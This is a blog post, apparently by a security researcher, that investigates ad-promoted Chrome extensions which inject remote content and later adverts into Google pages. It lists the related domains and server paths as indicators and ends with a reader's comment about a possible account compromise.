Google Chrome Extensions hiding and waiting?

Update 2018-11-03: I’ve finally managed to get one of the extensions to do something unwanted after weeks of being installed. The Zoom Picture extension is now injecting adverts into Google searches! Adverts that would otherwise not be there for the query I’m searching.

chrome hiding extensions.png

It looks like the adverts are pulled in from “othersearch.info” using “affid=8383”.

Update 2018-10-01: The Scroll To Top extension is still live in the Chrome store but the scammers have launched a new one.. “Zoom picture“. Also associated is “oitep.com”.

Update 2018-08-10: All the “with” extensions have been removed from the Chrome store but a new one has appeared, “Scroll To Top“.

Update 2018-06-25: Looks like Google have removed at least two of the suspicious extensions from the Chrome Store.. one still remains online.
junkextension contains malware

I’ve seen a strange advert around the internet recently .. sadly I don’t have a screenshot of the advert but it was claiming that I could click on it to get maps and directions.

Upon clicking on it via the advert you see a page relating to map directions:

vomesq

However on the second visit to the advert page if you don’t go via the advert and have cleared your cookies you get a very different page:

hiding extension title on second visit

Already suspicious.. why offer a “mapping” extension which is titled “Slideshow” and then why hide the mapping part of it if someone visits the site without going via the advert?

Clicking any of the elements on the page prompts you to install suspiciously named Google Chrome extensions. Such as:

Tetsop Slideshow with horses
Vomesq Slideshow with four seasons
Ustif slideshow with Rainbow
Klastaf Slideshow with four seasons
Scroll To Top by lacroix.clothilde”
Zoom picture by osbornehenry3″

tetsop

So, you install the extension.. and nothing useful happens. You don’t get driving directions but you do get horse pictures or other rotating GIF pictures inserted into the Google home page (as shown in the extension screenshot). At the time of screenshotting above the extension had 12,000 uses, as of time of writing this it now has 14,000 users.

The extension content as the ability to modify absolutely any web page the user visits. At the time of writing it appears to not be doing anything malicious.. the sites it regex matches against are Google domains..
Upon visiting a Google home page it then fetches some code from the extension host domain. This, at the moment, is just GIFs. It then injects that GIF code into the page.

What is the point. Someone is spending $$ on clicks on adverts to install a Chrome extension that doesn’t do anything related to the claims in the advert.

It almost seems like they are gathering a user base and will sell? or change? the Chrome Extension in the future to do something malicious or unintended.

Domains relating to this:
data1.vomesq.com
data1.tetsop.com
data1.ustif.com
data1.klastaf.com
natofo.com
travispa.com
onsevino.com
mixoum.com
toutravi.com
amoindi.com
resolve
data1.ustif.com
data1.open-dog.com
data1.gestona.com
data1.iti-maps.fr
data1.mareps.com
data1.teryom.com
data1.estracep.com
data1.imastifi.com
data1.lorelam.com
data1.meu-imc.com
data1.lolaji.com
data1.jounyl.com
data1.selbamo.com
data1.losimt.com
data1.ubersetzung-app.com
data1.anastras.com
data1.barbuna.com
data1.imc-peso.com
data1.ludimaro.com
data1.repossot.com
data1.noesla.com
data1.visoum.com
data1.rosalop.com
data1.exatrom.com
data1.onolli.com
data1.phistouquet.com
data1.felinao.com
data1.iginot.com
data1.makiloy.com
data1.futeala.com
data1.besinaf.com
data1.proufta.com
data1.pintoula.com
data1.nadasto.com
data1.mein-bmi.com
data1.qopletr.com
data1.toumina.com
data1.trumaeo.com
data1.ma-direction.com
data1.fertoul.com
data1.sopreni.com
data1.klastaf.com
data1.bmi-result.com
data1.chrchaimoua.com
data1.swapagg.com
data1.aligoram.com
data1.inadoul.com
data1.sollmia.com
data1.pictdog.com
data1.road-maps.fr
ip20.ip-91-121-54.eu
data1.scopich.com
data1.myloap.com
data1.platoks.com
data1.tetsop.com
data1.sabrelpt.com
data1.routenplaner-karten.com
data1.slimness.fr
data1.stoploco.com
data1.janomirg.com
data1.papsinim.com
data1.sabuf.com
data1.vomesq.com
data1.calcolo-bmi.com
data1.esiliq.com
data1.zargu.com
data1.eurosty.com
data1.noegate.com
data1.bicelou.com
data1.quotient-retraite.fr
data1.greskof.com
data1.bmi-tw.com
data1.maulou.com
data1.gorgiia.com
data1.chutalop.com
data1.quizdoamor.com
data1.oomatie.com
data1.cholty.com
data1.pomrolo.com
data1.point-meteo.fr
data1.recalomoy.com
data1.hyjouco.com
data1.roterf.com
data1.elixet.com
data1.consimis.com
data1.formulapeso.com
data1.saumaf.com
data1.cloakyz.com
data1.my-ideal-weight.com
data1.bmi-berech.com
data1.compasou.com
data1.qibizar.com
data1.poulixo.com
data1.perfect-imc.com
data1.modalas.com
data1.debozoiz.com
data1.mio-percorso.com
data1.plopatic.com
data1.carazouco.com
data1.strasscom.com
data1.frumaa.com
data1.solkyl.com
data1.zoobre.com
data1.rydima.com
data1.monstegou.com
data1.plifacil.com
data1.serlaz.com
data1.stoumo.com
data1.recettes-en-ligne.eu
data1.lettres.net
data1.trouvayca.com
data1.toustestests.com
data1.liloust.com
data1.pasruma.com
data1.lovincalculator.com
data1.stenap.com
data1.ablapol.com
data1.wikimot.fr
data1.olleap.com
data1.macoulpa.com
data1.mes-resultats.com
data1.astrolignes.com
data1.tests-moi.com
data1.dermabeauty.fr
data1.imc-calcular.com
data1.zunelrish.com
data1.kodamil.com
data1.yetras.com
data1.qhirta.com
data1.ruta-mapa.com
data1.eferif.com
data1.javelas.com
data1.ujdilon.com
data1.eneude.com
data1.shakkly.com
data1.bipoel.com
data1.nedolla.com
data1.quizdeamor.com
data1.tramolol.com
data1.kismuta.com
data1.tatoflex.com
data1.iglere.com
data1.roblaprouf.com
data1.grilsta.com
data1.gelupi.com
data1.logmati.com
data1.gopilou.com
data1.ohquizz.com
data1.uclat.com
data1.pronzal.com
data1.crisofil.com
data1.dom-app.com
data1.trajets-cartes.com
data1.blamap.com
data1.app-fast.com
data1.annitop.com
data1.nofinaj.com
data1.raepdi.com
data1.calcolo-imc.com
data1.clibar.com
data1.stuana.com
data1.meluli.com
data1.metoun.com
data1.rlicte.com
data1.my-drivingdirections.com
data1.phonalo.com
data1.seconnecter-ici.com
data1.sjilota.com
data1.tyhfepa.com
data1.cloumapco.com
data1.flomaga.com
data1.glicalol.com
data1.noxip.com
data1.gimoli.com
data1.modlat.com
data1.mimaloy.com
data1.manulap.com
data1.cichalou.com
data1.villonat.com
data1.sqadipt.com
data1.iblep.com
data1.slopap.com
data1.stropemer.com
data1.chloki.com
data1.bimwal.com
data1.vlouma.com
data1.satinat.com
data1.apps-italia.com
data1.bezadi.com
data1.samalag.com
data1.lolipt.com
data1.dailyforme.com
data1.start-bmi.com
data1.snarwin.com
data1.ahnat.com
data1.miazuz.com
data1.isobiv.com
data1.atoleg.com
data1.elplic.com
data1.ygivas.com
data1.gripoal.com
data1.klepst.com
data1.manipo.com
data1.luchil.com
data1.soqano.com
data1.baldoun.com
data1.troplip.com
data1.donasip.com
data1.solisoll.com
data1.satouna.com
data1.ortisul.com
data1.avortep.com
data1.stravit.com
data1.grexlip.com
data1.haverto.com
data1.blikux.com
data1.masowe.com
data1.slimya.com
data1.nistada.com
data1.lapretofe.com
data1.depemel.com
data1.sotella.com
data1.ofarnut.com
data1.peso-altezza.com
data1.pocket-rezept.com
data1.routen-karten.com
data1.open-cat.com
data1.meoust.com
data1.allastin.com
data1.naliora.com
data1.slapapi.com
data1.boulass.com
data1.mestaf.com
data1.routenweb.com
data1.recettes.net
data1.les-pages.com
data1.yummmi.es

Strings relating to this:
/plug-post-install.php
my-drivingdirections
partners/plugins/openanigif/openvomesq-data.php
partners/plugins/openanigif/opentetsop-data.php
partners/plugins/openanigif/open-regexps.php
update-version.php

This entry was posted in Uncategorized. Bookmark the permalink.

1 Response to Google Chrome Extensions hiding and waiting?

  1. Seb Wilkes says:

    Hello. My Mum had this on her laptop when I went to go see her, or one calling itself “Klastaf”

    I totally agree! No one spends $$ to get a gif onto the page, but I don’t know what’s going on. Recently the password I tried entering into our joint Amazon account did not work, and I can’t help but think the two situations are connected. (We currently live at different addresses)

    Thing is I am not that computer literate so I was wondering if you had got any further.

    Thanks for writing this! Seb

Comment on this topic

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s